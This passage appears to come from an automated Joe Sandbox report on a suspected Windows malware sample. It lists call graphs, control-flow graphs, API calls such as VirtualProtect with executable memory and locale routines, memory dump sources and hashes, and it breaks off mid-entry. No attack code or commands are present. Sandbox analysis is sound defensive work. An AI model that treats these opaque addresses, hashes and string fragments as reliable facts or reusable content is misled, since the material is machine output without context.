32302->32268 32303->32267 32304->32269 32307 fefe7e 32306->32307 32308 fefe85 32306->32308 32307->32275 32307->32276 32308->32307 32312 ff3ad1 39 API calls __Getctype 32308->32312 32310 fefebc 32313 ff3b2f 39 API calls _Fputc 32310->32313 32312->32310 32313->32307 32314->32284 32316 ff9fd2 GetCPInfo 32315->32316 32325 ffa09b 32315->32325 32322 ff9fea 32316->32322 32316->32325 32317 fe6ca2 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32319 ffa154 32317->32319 32319->32294 32326 ff8d25 32322->32326 32324 ff901c 44 API calls 32324->32325 32325->32317 32327 fefe67 std::_Locinfo::_Locinfo_ctor 39 API calls 32326->32327 32328 ff8d45 32327->32328 32346 ff94ae 32328->32346 32330 ff8e09 32333 fe6ca2 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32330->32333 32331 ff8e01 32349 fe6c84 HeapFree GetLastError ___std_exception_copy 32331->32349 32332 ff8d72 32332->32330 32332->32331 32335 ff3a83 std::_Locinfo::_Locinfo_ctor 3 API calls 32332->32335 32337 ff8d97 std::_Locinfo::_Locinfo_ctor CallUnexpected 32332->32337 32336 ff8e2c 32333->32336 32335->32337 32341 ff901c 32336->32341 32337->32331 32338 ff94ae std::_Locinfo::_Locinfo_ctor MultiByteToWideChar 32337->32338 32339 ff8de2 32338->32339 32339->32331 32340 ff8ded GetStringTypeW 32339->32340 32340->32331 32342 fefe67 std::_Locinfo::_Locinfo_ctor 39 API calls 32341->32342 32343 ff902f 32342->32343 32350 ff8e2e 32343->32350 32347 ff94bf MultiByteToWideChar 32346->32347 32347->32332 32349->32330 32351 ff8e49 32350->32351 32352 ff94ae std::_Locinfo::_Locinfo_ctor MultiByteToWideChar 32351->32352 32354 ff8e8f 32352->32354 32353 fe6ca2 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 32355 ff901a 32353->32355 32356 ff3a83 std::_Locinfo::_Locinfo_ctor 3 API calls 32354->32356 32358 ff8eb5 std::_Locinfo::_Locinfo_ctor 32354->32358 32359 ff9007 32354->32359 32366 ff8f3b 32354->32366 32355->32324 32356->32358 32360 ff94ae std::_Locinfo::_Locinfo_ctor MultiByteToWideChar 32358->32360 32358->32366 32359->32353 32361 ff8efa 32360->32361 32361->32366 32378 ff6368 32361->32378 32364 ff8f2c 32364->32366 32369 ff6368 std::_Locinfo::_Locinfo_ctor 7 API calls 32364->32369 32365 ff8f64 32367 ff8fef 32365->32367 32370 ff3a83 std::_Locinfo::_Locinfo_ctor 3 API calls 32365->32370 32371 ff8f76 std::_Locinfo::_Locinfo_ctor 32365->32371 32390 fe6c84 HeapFree GetLastError ___std_exception_copy 32366->32390 32389 fe6c84 HeapFree GetLastError ___std_exception_copy 32367->32389 32369->32366 32370->32371 32371->32367 32372 ff6368 std::_Locinfo::_Locinfo_ctor 7 API calls 32371->32372 32373 ff8fb9 32372->32373 32373->32367 32387 ff952a WideCharToMultiByte 32373->32387 32375 ff8fd3 32375->32367 32376 ff8fdc 32375->32376 32388 fe6c84 HeapFree GetLastError ___std_exception_copy 32376->32388 32391 ff5f14 32378->32391 32381 ff6379 LCMapStringEx 32386 ff63c0 32381->32386 32382 ff63a0 32394 ff63c5 5 API calls std::_Locinfo::_Locinfo_ctor 32382->32394 32385 ff63b9 LCMapStringW 32385->32386 32386->32364 32386->32365 32386->32366 32387->32375 32388->32366 32389->32366 32390->32359 32395 ff6015 32391->32395 32394->32385 32396 ff5f2a 32395->32396 32397 ff6043 32395->32397 32396->32381 32396->32382 32397->32396 32402 ff5f4a LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsSetValue 32397->32402 32399 ff6057 32399->32396 32400 ff605d GetProcAddress 32399->32400 32400->32396 32401 ff606d std::_Lockit::_Lockit 32400->32401 32401->32396 32402->32399

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 fe2021-fe2068 1 fe206a-fe206d 0->1 2 fe2074-fe207f 0->2 3 fe206f-fe2072 1->3 4 fe20bb-fe20c8 1->4 5 fe2083-fe209e 2->5 3->5 7 fe20cb-fe20e5 4->7 5->4 6 fe20a0-fe20a6 5->6 8 fe20ee-fe20f9 6->8 9 fe20a8-fe20b9 6->9 7->8 10 fe20e7-fe20ec 7->10 11 fe20fd-fe211d 8->11 9->7 10->11 12 fe213e-fe2147 11->12 13 fe211f-fe2122 11->13 16 fe214a-fe215a 12->16 14 fe2124-fe213c 13->14 15 fe2163-fe217b 13->15 14->16 18 fe217f-fe218c 15->18 16->15 17 fe215c-fe2161 16->17 17->18 19 fe218e-fe2195 18->19 20 fe2197-fe21a2 18->20 21 fe21a6-fe21c1 19->21 20->21 22 fe21d2-fe21ed 21->22 23 fe21c3-fe21c6 21->23 26 fe21f0-fe21f3 22->26 24 fe21fe-fe2202 23->24 25 fe21c8-fe21d0 23->25 28 fe2204-fe2266 call fe2003 24->28 25->26 26->24 27 fe21f5-fe21fc 26->27 27->28 31 fe2278-fe2289 28->31 32 fe2268-fe226e 28->32 35 fe228d-fe2294 31->35 33 fe22a6-fe22c2 32->33 34 fe2270-fe2276 32->34 37 fe22c6-fe22cf 33->37 34->35 35->33 36 fe2296-fe2299 35->36 38 fe229b-fe22a4 36->38 39 fe22f9-fe2301 36->39 37->39 40 fe22d1-fe22d7 37->40 38->37 41 fe2304-fe230d 39->41 42 fe22d9-fe22f7 40->42 43 fe2330-fe2343 40->43 41->43 44 fe230f-fe2312 41->44 42->41 45 fe2345-fe2350 43->45 46 fe2314-fe232e 44->46 47 fe2361-fe2374 44->47 45->47 48 fe2352-fe235f 45->48 46->45 49 fe2376-fe2389 47->49 48->49 50 fe23aa-fe23af 49->50 51 fe238b-fe23a8 49->51 52 fe23b1-fe23cc 50->52 51->52 53 fe23ce-fe23dd 52->53 54 fe23df-fe23e4 52->54 55 fe23e8-fe23ee 53->55 54->55 56 fe23fb-fe2406 55->56 57 fe23f0-fe23f9 55->57 58 fe2409-fe2410 56->58 57->58 59 fe2416-fe2427 58->59 60 fe2412-fe2414 58->60 61 fe2428-fe2430 59->61 60->61 62 fe2437-fe244f 61->62 63 fe2432-fe2435 61->63 64 fe2453-fe2454 62->64 63->64 65 fe246e-fe2480 64->65 66 fe2456-fe246c 64->66 67 fe2483-fe24a1 65->67 66->67 68 fe24c3 67->68 69 fe24a3-fe24c1 67->69 70 fe24c6-fe254a call fe1bee 68->70 69->70 73 fe254c-fe254f 70->73 74 fe256a-fe2582 70->74 75 fe25b8-fe25c5 73->75 76 fe2551-fe2568 73->76 77 fe2584-fe259e 74->77 79 fe25ca-fe25e6 75->79 76->77 77->75 78 fe25a0-fe25b6 77->78 78->79 80 fe25e8-fe25eb 79->80 81 fe25f2-fe25f7 79->81 82 fe261c-fe2625 80->82 83 fe25ed-fe25f0 80->83 84 fe25fa-fe2609 81->84 86 fe2629-fe262d 82->86 83->84 84->82 85 fe260b-fe260e 84->85 87 fe2642-fe2656 85->87 88 fe2610-fe261a 85->88 86->87 89 fe262f-fe2632 86->89 90 fe2658-fe266e 87->90 88->86 91 fe2634-fe2640 89->91 92 fe2681-fe269c 89->92 90->92 93 fe2670-fe267f 90->93 91->90 94 fe269d-fe26b1 92->94 93->94 95 fe26b3-fe26be 94->95 96 fe26c0-fe26da 94->96 97 fe26dd-fe273d call fe1f49 VirtualProtect 95->97 96->97 100 fe273f-fe277a call fe1bee AttachConsole 97->100 101 fe2783-fe2789 97->101 100->101
                                                APIs
                                                • VirtualProtect.KERNELBASE(0105A6D8,?,00000040,?), ref: 00FE2738
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID: '$S$a
                                                • API String ID: 544645111-1060379873
                                                • Opcode ID: 5309abc772c5609ad207f6dc6a5fbb16bdb8486e620e5bb072a62e08bd8ab2d1
                                                • Instruction ID: ec6f992b0797af538a0e9a2db8ad35627cc23247873d89307d3018635e25ea71
                                                • Opcode Fuzzy Hash: 5309abc772c5609ad207f6dc6a5fbb16bdb8486e620e5bb072a62e08bd8ab2d1
                                                • Instruction Fuzzy Hash: 87F1CF27D34E5B06E748643A8D522E5A54EE7EA330F914333BE639B3F4F3690941B285

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 104 ff8e2e-ff8e47 105 ff8e5d-ff8e62 104->105 106 ff8e49-ff8e59 call ff044d 104->106 108 ff8e64-ff8e6e 105->108 109 ff8e71-ff8e97 call ff94ae 105->109 106->105 112 ff8e5b 106->112 108->109 114 ff8e9d-ff8ea8 109->114 115 ff900a-ff901b call fe6ca2 109->115 112->105 117 ff8eae-ff8eb3 114->117 118 ff8ffd 114->118 119 ff8ec8-ff8ed3 call ff3a83 117->119 120 ff8eb5-ff8ebe call fe7270 117->120 121 ff8fff 118->121 129 ff8ede-ff8ee2 119->129 131 ff8ed5 119->131 120->129 130 ff8ec0-ff8ec6 120->130 125 ff9001-ff9008 call fe6c84 121->125 125->115 129->121 134 ff8ee8-ff8eff call ff94ae 129->134 133 ff8edb 130->133 131->133 133->129 134->121 137 ff8f05-ff8f17 call ff6368 134->137 139 ff8f1c-ff8f20 137->139 140 ff8f3b-ff8f3d 139->140 141 ff8f22-ff8f2a 139->141 140->121 142 ff8f2c-ff8f31 141->142 143 ff8f64-ff8f70 141->143 144 ff8f37-ff8f39 142->144 145 ff8fe3-ff8fe5 142->145 146 ff8fef 143->146 147 ff8f72-ff8f74 143->147 144->140 149 ff8f42-ff8f5c call ff6368 144->149 145->125 148 ff8ff1-ff8ff8 call fe6c84 146->148 150 ff8f89-ff8f94 call ff3a83 147->150 151 ff8f76-ff8f7f call fe7270 147->151 148->140 149->145 161 ff8f62 149->161 150->148 160 ff8f96 150->160 151->148 162 ff8f81-ff8f87 151->162 163 ff8f9c-ff8fa1 160->163 161->140 162->163 163->148 164 ff8fa3-ff8fbb call ff6368 163->164 164->148 167 ff8fbd-ff8fc4 164->167 168 ff8fe7-ff8fed 167->168 169 ff8fc6-ff8fc7 167->169 170 ff8fc8-ff8fda call ff952a 168->170 169->170 170->148 173 ff8fdc-ff8fe2 call fe6c84 170->173 173->145
                                                APIs
                                                • __freea.LIBCMT ref: 00FF8FDD
                                                  • Part of subcall function 00FF3A83: HeapAlloc.KERNEL32(00000000,00FFA1AA,?,?,00FFA1AA,00000220,?,?,?), ref: 00FF3AB5
                                                • __freea.LIBCMT ref: 00FF8FF2
                                                • __freea.LIBCMT ref: 00FF9002
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea$AllocHeap
                                                • String ID:
                                                • API String ID: 85559729-0
                                                • Opcode ID: e7f1596bbb5d7ab4219e7bb61e4122d25e9dc040928cbad9bc4846da0a972772
                                                • Instruction ID: 7588485c16a472d9b10dc723da6733f9edb21086708be601152a69292c831a27
                                                • Opcode Fuzzy Hash: e7f1596bbb5d7ab4219e7bb61e4122d25e9dc040928cbad9bc4846da0a972772
                                                • Instruction Fuzzy Hash: 4351BB72A0021E6FEF219F65CC41EBB36AAEF447A0B150129FE14D71A0EF75CD51A760

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 176 ffa3a6-ffa3ce call ff9ed6 179 ffa596-ffa597 call ff9f47 176->179 180 ffa3d4-ffa3da 176->180 183 ffa59c-ffa59e 179->183 181 ffa3dd-ffa3e3 180->181 184 ffa3e9-ffa3f5 181->184 185 ffa4e5-ffa504 call fe8240 181->185 186 ffa59f-ffa5ad call fe6ca2 183->186 184->181 187 ffa3f7-ffa3fd 184->187 195 ffa507-ffa50c 185->195 190 ffa4dd-ffa4e0 187->190 191 ffa403-ffa40f IsValidCodePage 187->191 190->186 191->190 194 ffa415-ffa41c 191->194 198 ffa41e-ffa42a 194->198 199 ffa444-ffa451 GetCPInfo 194->199 196 ffa50e-ffa513 195->196 197 ffa549-ffa553 195->197 200 ffa546 196->200 201 ffa515-ffa51d 196->201 197->195 202 ffa555-ffa57f call ff9e98 197->202 203 ffa42e-ffa43a call ff9faa 198->203 204 ffa453-ffa472 call fe8240 199->204 205 ffa4d1-ffa4d7 199->205 200->197 206 ffa51f-ffa522 201->206 207 ffa53e-ffa544 201->207 216 ffa580-ffa58f 202->216 213 ffa43f 203->213 204->203 217 ffa474-ffa47b 204->217 205->179 205->190 211 ffa524-ffa52a 206->211 207->196 207->200 211->207 215 ffa52c-ffa53c 211->215 213->183 215->207 215->211 216->216 220 ffa591 216->220 218 ffa47d-ffa482 217->218 219 ffa4a7-ffa4aa 217->219 218->219 221 ffa484-ffa48c 218->221 222 ffa4af-ffa4b6 219->222 220->179 223 ffa49f-ffa4a5 221->223 224 ffa48e-ffa495 221->224 222->222 225 ffa4b8-ffa4cc call ff9e98 222->225 223->218 223->219 226 ffa496-ffa49d 224->226 225->203 226->223 226->226
                                                APIs
                                                  • Part of subcall function 00FF9ED6: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00FF9F01
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00FFA1ED,?,00000000,?,?,?), ref: 00FFA407
                                                • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FFA1ED,?,00000000,?,?,?), ref: 00FFA449
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID:
                                                • API String ID: 546120528-0
                                                • Opcode ID: 6aa472e2175474f5842b6b1bac8def583ca3fb1204f5ea971a896e0ff35a0140
                                                • Instruction ID: f661c2984bfae50b2ac965a7b8505934aa28b031019b53930be1dad181be4205
                                                • Opcode Fuzzy Hash: 6aa472e2175474f5842b6b1bac8def583ca3fb1204f5ea971a896e0ff35a0140
                                                • Instruction Fuzzy Hash: 695127B1D002498FDB21CF75C8846BABBF5EF44310F18406ED28ACB271E7B99945EB52

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 229 ff6368-ff6377 call ff5f14 232 ff6379-ff639e LCMapStringEx 229->232 233 ff63a0-ff63ba call ff63c5 LCMapStringW 229->233 237 ff63c0-ff63c2 232->237 233->237
                                                APIs
                                                • LCMapStringEx.KERNELBASE(?,00FF8F1C,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00FF639C
                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00FF8F1C,?,?,00000000,?,00000000), ref: 00FF63BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String
                                                • String ID:
                                                • API String ID: 2568140703-0
                                                • Opcode ID: b30d188ad5679ae7a7de46859f5182bdf23ef7457b45f5f285842f01f157b622
                                                • Instruction ID: c69a2cfe56159150ea44d20e3a1f1b3ded0e0e66e3b6124af0452c5759db0b80
                                                • Opcode Fuzzy Hash: b30d188ad5679ae7a7de46859f5182bdf23ef7457b45f5f285842f01f157b622
                                                • Instruction Fuzzy Hash: C2F0243640055EBBCF136F90DC09AEE7E66AF487A0F058110FA18A9130CB3AD975BB95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 238 ff9faa-ff9fcc 239 ffa0e5-ffa10b 238->239 240 ff9fd2-ff9fe4 GetCPInfo 238->240 242 ffa110-ffa115 239->242 240->239 241 ff9fea-ff9ff1 240->241 243 ff9ff3-ff9ffd 241->243 244 ffa11f-ffa125 242->244 245 ffa117-ffa11d 242->245 243->243 246 ff9fff-ffa012 243->246 248 ffa127-ffa12a 244->248 249 ffa131 244->249 247 ffa12d-ffa12f 245->247 251 ffa033-ffa035 246->251 250 ffa133-ffa145 247->250 248->247 249->250 250->242 252 ffa147-ffa155 call fe6ca2 250->252 253 ffa037-ffa06e call ff8d25 call ff901c 251->253 254 ffa014-ffa01b 251->254 264 ffa073-ffa0a8 call ff901c 253->264 256 ffa02a-ffa02c 254->256 259 ffa02e-ffa031 256->259 260 ffa01d-ffa01f 256->260 259->251 260->259 263 ffa021-ffa029 260->263 263->256 267 ffa0aa-ffa0b4 264->267 268 ffa0b6-ffa0c0 267->268 269 ffa0c2-ffa0c4 267->269 270 ffa0d4-ffa0e1 268->270 271 ffa0c6-ffa0d0 269->271 272 ffa0d2 269->272 270->267 273 ffa0e3 270->273 271->270 272->270 273->252
                                                APIs
                                                • GetCPInfo.KERNEL32(E8458D00,?,00FFA1F9,00FFA1ED,00000000), ref: 00FF9FDC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-0
                                                • Opcode ID: 165665a0e4c8bf8ab721a19701a0e8cc2139e4128671b5573e339de22553673b
                                                • Instruction ID: 4305d69cc6b77c1efab1beefd8b73ed05db65d8750430bfb88c35de5a6ca0158
                                                • Opcode Fuzzy Hash: 165665a0e4c8bf8ab721a19701a0e8cc2139e4128671b5573e339de22553673b
                                                • Instruction Fuzzy Hash: E4515CB290425C9ADB218B28DC80BF67BBCEF45304F2405EDE29EC7152D6759D46EF21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: +4#$-]45$-ms$2- #$6"k~$7.?j$8@[*$9]`V$G>q$h2=?$hw^
                                                • API String ID: 0-103661567
                                                • Opcode ID: 7901161aae9f9da5d229c51b76c7ce90f08aceb943cd7e8fa9e8ea12c19d518a
                                                • Instruction ID: bff9e2f65b663d48a72e304f6a610a69b022bddb9e4413f22921b4d08b5c7acb
                                                • Opcode Fuzzy Hash: 7901161aae9f9da5d229c51b76c7ce90f08aceb943cd7e8fa9e8ea12c19d518a
                                                • Instruction Fuzzy Hash: 6183217241E7D41EC7278B308AB65A17FA9FE9321031D4ACFC5C18F4B3C664991AE366
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 5d470917f00a0cb848f9fc813ec1ee89b443faeae3ce1c33dec930312e3c8b57
                                                • Instruction ID: bc467d2c187dcd2394e4652d229d8e23a8b321a6a02af1b23811719cadd93339
                                                • Opcode Fuzzy Hash: 5d470917f00a0cb848f9fc813ec1ee89b443faeae3ce1c33dec930312e3c8b57
                                                • Instruction Fuzzy Hash: ACD21772E0822C8BDB65DE28CD407EAB7B5EF44314F1441EAD54DE7260EB78AE819F41
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00FFCB32,00000002,00000000,?,?,?,00FFCB32,?,00000000), ref: 00FFC8AD
                                                • GetLocaleInfoW.KERNEL32(?,20001004,00FFCB32,00000002,00000000,?,?,?,00FFCB32,?,00000000), ref: 00FFC8D6
                                                • GetACP.KERNEL32(?,?,00FFCB32,?,00000000), ref: 00FFC8EB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: 9d04be033b279537e95fedd7d35ab80e005805bdbea3e5fbb9cfa01a753c81d0
                                                • Instruction ID: 9b88c4ea803cd4f9322fac12db32543be0257c6a6b0788b6fae1c56dc29631eb
                                                • Opcode Fuzzy Hash: 9d04be033b279537e95fedd7d35ab80e005805bdbea3e5fbb9cfa01a753c81d0
                                                • Instruction Fuzzy Hash: 21215332E0012D9AEB35CF55CA01AB776A6BF54FB0B564424EB49D7121EB32DD40E3D0
                                                APIs
                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00FFCAF5
                                                • IsValidCodePage.KERNEL32(00000000), ref: 00FFCB3E
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00FFCB4D
                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00FFCB95
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00FFCBB4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                • String ID:
                                                • API String ID: 3475089800-0
                                                • Opcode ID: 058c699133a6e01d0ea82ddd51bda23de008fc0cee4a28255a814792ef6a034e
                                                • Instruction ID: 833292a6dc17e19dfd3e7ad326fad88b05acc9cfca973b719be85af4d7588210
                                                • Opcode Fuzzy Hash: 058c699133a6e01d0ea82ddd51bda23de008fc0cee4a28255a814792ef6a034e
                                                • Instruction Fuzzy Hash: B1519171E0022D9FDB21DFA5CD41ABA77B8FF44710F154029E750E71A0E779A904EBA0
                                                APIs
                                                • GetACP.KERNEL32(?,?,?,?,?,?,00FF1848,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FFC146
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FF1848,?,?,?,00000055,?,-00000050,?,?), ref: 00FFC171
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FFC2D4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
